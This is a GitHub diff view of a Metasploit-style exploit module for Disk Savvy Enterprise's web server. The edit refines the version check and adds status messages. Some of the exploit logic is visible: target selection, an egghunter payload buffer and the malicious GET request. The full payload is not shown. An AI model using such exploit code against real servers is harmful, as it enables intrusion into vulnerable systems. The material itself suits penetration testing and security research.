File tree Expand file tree Collapse file tree 1 file changed +9
-4
lines changed
modules/exploits/windows/http Expand file tree Collapse file tree 1 file changed +9
-4
lines changed Original file line number Diff line number Diff line change @@ -77,9 +77,12 @@ def check
77
77
)
78
78
79
79
if res && res . code == 200
80
- if res . body =~ /Disk Savvy Enterprise v9\. (1|3)\. 14/
81
- return Exploit ::CheckCode ::Appears
82
- elsif res . body =~ /Disk Savvy Enterprise/
80
+ version = res . body [ /Disk Savvy Enterprise v[^<]*/ ]
81
+ if version
82
+ vprint_status ( "Version detected: #{ version } " )
83
+ if version =~ /9\. (1|3)\. 14/
84
+ return Exploit ::CheckCode ::Appears
85
+ end
83
86
return Exploit ::CheckCode ::Detected
84
87
end
85
88
else
@@ -115,7 +118,7 @@ def exploit
115
118
fail_with ( Failure ::NoTarget , 'No matching target' )
116
119
end
117
120
118
- print_status ( "Selected Target : #{ mytarget . name } " )
121
+ print_status ( "Selected target : #{ mytarget . name } " )
119
122
end
120
123
121
124
eggoptions = {
@@ -137,6 +140,8 @@ def exploit
137
140
sploit << hunter
138
141
sploit << rand_text_alpha ( 4500 )
139
142
143
+ print_status ( 'Sending malicious request...' )
144
+
140
145
send_request_cgi (
141
146
'method' => 'GET' ,
142
147
'uri' => sploit
You can’t perform that action at this time.
0 commit comments